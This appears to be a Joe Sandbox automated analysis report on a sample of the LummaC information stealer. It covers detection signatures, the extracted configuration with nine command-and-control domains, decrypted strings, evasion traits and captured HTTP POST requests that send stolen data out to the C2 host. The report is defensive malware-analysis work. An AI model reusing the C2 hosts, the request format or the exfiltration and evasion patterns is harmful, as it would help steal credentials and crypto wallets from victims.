Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002A_236.exe

Overview

General Information

Sample name:LisectAVT_2403002A_236.exe
Analysis ID:1482389
MD5:8ecbc517b61cdb069495b3f3e3887a0f
SHA1:4b9170f6fe8e1b77fa1462efd4299930479f98cd
SHA256:4c98f158e7654d83e23027e9c94b5a6d27837c3e0302e0619b7540fe1387645e
Tags:exeRaccoonStealer
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Detected VMProtect packer
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • LisectAVT_2403002A_236.exe (PID: 6236 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_236.exe" MD5: 8ECBC517B61CDB069495B3F3E3887A0F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "relevantvoicelesskw.shop", "colorfulequalugliess.shop", "wisemassiveharmonious.shop", "unhappytidydryypwto.shop"], "Build id": "GjKsB2--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-25T22:14:44.163830+0200
            SID:2051469
            Source Port:54364
            Destination Port:53
            Protocol:UDP
            Classtype:Domain Observed Used for C2 Detected
            Timestamp:2024-07-25T22:14:45.734706+0200
            SID:2054653
            Source Port:49706
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T22:15:01.133815+0200
            SID:2022930
            Source Port:443
            Destination Port:49713
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T22:14:48.209574+0200
            SID:2048094
            Source Port:49708
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T22:14:44.698527+0200
            SID:2051476
            Source Port:49706
            Destination Port:443
            Protocol:TCP
            Classtype:Domain Observed Used for C2 Detected
            Timestamp:2024-07-25T22:14:55.547747+0200
            SID:2051476
            Source Port:49712
            Destination Port:443
            Protocol:TCP
            Classtype:Domain Observed Used for C2 Detected
            Timestamp:2024-07-25T22:14:46.553302+0200
            SID:2051476
            Source Port:49707
            Destination Port:443
            Protocol:TCP
            Classtype:Domain Observed Used for C2 Detected
            Timestamp:2024-07-25T22:14:50.869302+0200
            SID:2051476
            Source Port:49710
            Destination Port:443
            Protocol:TCP
            Classtype:Domain Observed Used for C2 Detected
            Timestamp:2024-07-25T22:14:53.722138+0200
            SID:2051476
            Source Port:49711
            Destination Port:443
            Protocol:TCP
            Classtype:Domain Observed Used for C2 Detected
            Timestamp:2024-07-25T22:14:47.703503+0200
            SID:2051476
            Source Port:49708
            Destination Port:443
            Protocol:TCP
            Classtype:Domain Observed Used for C2 Detected
            Timestamp:2024-07-25T22:14:48.905289+0200
            SID:2051476
            Source Port:49709
            Destination Port:443
            Protocol:TCP
            Classtype:Domain Observed Used for C2 Detected
            Timestamp:2024-07-25T22:14:47.027495+0200
            SID:2054653
            Source Port:49707
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T22:14:49.759772+0200
            SID:2048094
            Source Port:49709
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T22:14:55.552815+0200
            SID:2843864
            Source Port:49712
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: LisectAVT_2403002A_236.exeAvira: detected
            Antivirus detection for URL or domain
            Source: associationokeo.shopAvira URL Cloud: Label: malware
            Source: https://unhappytidydryypwto.shop/api#:Avira URL Cloud: Label: phishing
            Source: unhappytidydryypwto.shopAvira URL Cloud: Label: phishing
            Source: https://unhappytidydryypwto.shop/Avira URL Cloud: Label: phishing
            Source: colorfulequalugliess.shopAvira URL Cloud: Label: phishing
            Source: https://unhappytidydryypwto.shop:443/apiAvira URL Cloud: Label: phishing
            Source: turkeyunlikelyofw.shopAvira URL Cloud: Label: malware
            Source: https://unhappytidydryypwto.shop/apiAvira URL Cloud: Label: phishing
            Source: detectordiscusser.shopAvira URL Cloud: Label: malware
            Source: https://unhappytidydryypwto.shop/apin:LAvira URL Cloud: Label: phishing
            Source: relevantvoicelesskw.shopAvira URL Cloud: Label: phishing
            Source: https://unhappytidydryypwto.shop/44Avira URL Cloud: Label: phishing
            Found malware configuration
            Source: 0.2.LisectAVT_2403002A_236.exe.3b0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "relevantvoicelesskw.shop", "colorfulequalugliess.shop", "wisemassiveharmonious.shop", "unhappytidydryypwto.shop"], "Build id": "GjKsB2--"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: LisectAVT_2403002A_236.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: associationokeo.shop
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: turkeyunlikelyofw.shop
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: pooreveningfuseor.pw
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: edurestunningcrackyow.fun
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: detectordiscusser.shop
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: relevantvoicelesskw.shop
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: colorfulequalugliess.shop
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: wisemassiveharmonious.shop
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: unhappytidydryypwto.shop
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpString decryptor: GjKsB2--
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C4F69 CryptUnprotectData,0_2_003C4F69
            Source: LisectAVT_2403002A_236.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: LisectAVT_2403002A_236.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000080h]0_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_003D12E2
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then cmp dword ptr [eax-08h], 5C3924FCh0_2_003C541A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]0_2_003B95E0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then lea esi, dword ptr [edx+ecx]0_2_003CD860
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_003C390E
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]0_2_003E2156
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then movzx eax, byte ptr [esi+ecx]0_2_003BD1C0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then test esi, esi0_2_003E52C9
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then jmp ecx0_2_003E3458
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then jmp eax0_2_003E4489
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]0_2_003C05BD
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_003DD620
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]0_2_003C561D
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000080h]0_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]0_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A8h]0_2_003C4810
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then jmp eax0_2_003C19E7
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then jmp ecx0_2_003BFA7F
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then jmp ecx0_2_003BFA72
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]0_2_003B7B20
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [003EDC58h]0_2_003CCB43
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov edi, dword ptr [esi+0Ch]0_2_003CFB8E
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]0_2_003CCB80
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]0_2_003E2C52
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000080h]0_2_003D0D8E
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]0_2_003C0E43
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 4x nop then mov eax, edi0_2_003E4FB2

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: associationokeo.shop
            Source: Malware configuration extractorURLs: turkeyunlikelyofw.shop
            Source: Malware configuration extractorURLs: pooreveningfuseor.pw
            Source: Malware configuration extractorURLs: edurestunningcrackyow.fun
            Source: Malware configuration extractorURLs: detectordiscusser.shop
            Source: Malware configuration extractorURLs: relevantvoicelesskw.shop
            Source: Malware configuration extractorURLs: colorfulequalugliess.shop
            Source: Malware configuration extractorURLs: wisemassiveharmonious.shop
            Source: Malware configuration extractorURLs: unhappytidydryypwto.shop
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: unhappytidydryypwto.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: unhappytidydryypwto.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 13684Host: unhappytidydryypwto.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16199Host: unhappytidydryypwto.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20574Host: unhappytidydryypwto.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1379Host: unhappytidydryypwto.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584281Host: unhappytidydryypwto.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: unhappytidydryypwto.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: unhappytidydryypwto.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1360508594.0000000001419000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.00000000013C5000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1372307247.0000000001469000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1360508594.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1462355021.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1463876472.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unhappytidydryypwto.shop/
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1418365611.0000000001466000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1405389775.0000000001465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unhappytidydryypwto.shop/44
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1410106897.000000000146C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unhappytidydryypwto.shop/api
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unhappytidydryypwto.shop/api#:
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1387782522.0000000001468000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unhappytidydryypwto.shop/apin:L
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1387782522.0000000001468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unhappytidydryypwto.shop:443/api
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
